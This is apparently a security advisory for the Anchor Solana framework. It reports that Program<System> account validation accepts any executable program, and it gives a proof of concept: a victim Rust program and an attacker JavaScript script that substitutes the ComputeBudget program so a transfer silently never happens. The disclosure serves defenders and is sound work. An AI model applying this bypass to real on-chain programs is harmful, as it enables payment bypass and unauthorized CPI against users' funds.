Anchor: Program<'info, System> is not properly validated
Description
Summary
An logic error causes anchor programs to accept any program id when requiring the system program id, causing false assumptions resulting in potential arbitrary cpi in programs that invoke system program instructions.
Details
In the TryFrom<&'a AccountInfo<'a>> implementation for Program<'a, T>, the id of T is compared with Pubkey::default() to check whether anchor should allow any executable account, or a specific account, because when no T is supplied, T defaults to (), which implements Id::id() by returning Pubkey::default(). This results in T = () and T = System (which has Pubkey::default() as the id) having the same behavior, both allow any executable account. Programs built with anchor assume that the anchor runtime verifies passed in programs of type Program<'a, System> are in fact the system program. This false assumption can lead to arbitrary CPI or payment bypassing when programs try making CPI calls to the system program using the passed in system program due to the fact that the attacker can pass in any program instead of the system program.
https://github.com/solana-foundation/anchor/blob/5ff3f96eeda91cc54b7fa525631eb8c1394fda04/lang/src/accounts/program.rs#L148-L163
PoC
Build and deploy the following anchor program: ``rs /// victim.rs /// an anchor program that uses the system program in some way. use anchor_lang::prelude::*; use anchor_lang::prelude::program::invoke; use anchor_lang::prelude::instruction::Instruction; #[derive(Accounts)] pub struct Initialize<'info> { #[account(mut)] pub sender: Signer<'info>, #[account(mut)] pub recipient: SystemAccount<'info>, // the "System" part here should ensure that callers can only pass the system program. pub system_program: Program<'info, System>, } pub fn handler(ctx: Context<Initialize>, amount: u64) -> Result<()> { // this should be the system program id, but due to an issue in the validation logic, this could be any program id. msg!("System program: {:?}", ctx.accounts.system_program.key()); // construct a transfer instruction // note that not only raw instructions, but also any other instruction // builders that properly forward the passed in program id are vulnerable. let mut data = Vec::new(); data.extend_from_slice(&[2, 0, 0, 0]); // transfer discriminator data.extend_from_slice(&amount.to_le_bytes()); // amount let accounts = vec![ AccountMeta::new(ctx.accounts.sender.key(), true), AccountMeta::new(ctx.accounts.recipient.key(), false), ]; let ix = Instruction { program_id: ctx.accounts.system_program.key(), accounts, data, }; let account_infos = [ ctx.accounts.sender.to_account_info(), ctx.accounts.recipient.to_account_info(), ctx.accounts.system_program.to_account_info(), ]; // invoke the transfer instruction invoke(&ix, &account_infos)?; Ok(()) } ``
Run the following javascript code in the project after installing @coral-xyz/anchor and @solana/web3.js
/// attacker.js
/// a script that exploits the vulnerability in the victim program, in this case it simply causes the transfer to never happen
/// while the victim program thinks it has happened.
import { Connection, Keypair, PublicKey, SystemProgram } from "@solana/web3.js";
import { AnchorProvider, Program, Wallet } from "@coral-xyz/anchor";
import BN from "bn.js";
import fs from "fs";
import idl from "./victim_idl.json" with { type: "json" }; // the idl of the victim program, generated by `anchor build`
const keypair = Keypair.generate();
const receiver = Keypair.generate();
const connection = new Connection("http://localhost:8899", "confirmed");
const provider = new AnchorProvider(connection, new Wallet(keypair), {});
async function airdrop(publicKey, amount) {
const tx = await connection.requestAirdrop(publicKey, amount);
await connection.confirmTransaction(tx);
console.log(`Airdropped ${amount} lamports to ${publicKey.toBase58()}`);
}
async function printBalance(publicKey) {
const balance = await connection.getBalance(publicKey);
console.log(`Balance of ${publicKey.toBase58()}: ${balance} lamports`);
}
await airdrop(keypair.publicKey, 1e9);
await airdrop(receiver.publicKey, 1e9);
const program = new Program(idl, provider);
const tx = await program.methods
.initialize(new BN(1e9 / 2))
.accounts({
sender: keypair.publicKey,
recipient: receiver.publicKey,
// we pass the compute budget program instead of the system program
// the victim will call the compute budget program thinking it's the system program, and the transfer will never happen.
// if we comment this out, anchor will pass in the system program and the transfer will succeed
systemProgram: new PublicKey("ComputeBudget111111111111111111111111111111"),
})
.rpc();
console.log("Transaction signature:", tx);
await connection.confirmTransaction(tx);
// Check balances
await printBalance(keypair.publicKey);
await printBalance(receiver.publicKey);
/*
expected balances:
499995000
1500000000
actual balances:
999995000
1000000000
*/
Inspect the solana validator logs and javascript output, you'll see the program did not transfer any lamports.
If you uncomment the systemProgram account override in the javascript code and rerun it, you'll see the victim program behaves as expected and lamports are actually transferred.
Impact
This is an account validation bypass, impacting on-chain programs that rely on the system program. It allows for potential CPI and payment bypasses, amongst other issues such as accounts being created through CPI that should be owned by system program now being owned by an attacker controlled program.
Affected products
1- Range: >= 1.0.0, < 1.0.2
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
3News mentions
12- CVE-2026-20182: Critical authentication bypass in Cisco Catalyst SD-WAN Controller (FIXED)Rapid7 Blog · May 14, 2026
- Mustang Panda Linked to Updated FDMTP Backdoor in Asia-Pacific Espionage CampaignInfosecurity Magazine · May 14, 2026
- The Convergence of Cloud Secrets & AI RiskSentinelOne Labs · May 13, 2026
- Thus Spoke…The GentlemenCheck Point Research · May 13, 2026
- SAP unveils Autonomous Enterprise for AI-driven business operationsHelp Net Security · May 12, 2026
- When "idle" isn't idle: how a Linux kernel optimization became a QUIC bugCloudflare Blog · May 12, 2026
- Unplug your way to better codeCisco Talos Intelligence · May 7, 2026
- When DNSSEC goes wrong: how we responded to the .de TLD outageCloudflare Blog · May 6, 2026
- Meta adds proof-based security to encrypted backupsHelp Net Security · May 5, 2026
- ThreatsDay Bulletin: SMS Blaster Busts, OpenEMR Flaws, 600K Roblox Hacks and 25 More StoriesThe Hacker News · Apr 30, 2026
- Cisco releases open-source toolkit for verifying AI model lineageHelp Net Security · Apr 30, 2026
- GoDaddy customer claims registrar transferred 27-year-old domain without any security checksThe Register Security · Apr 29, 2026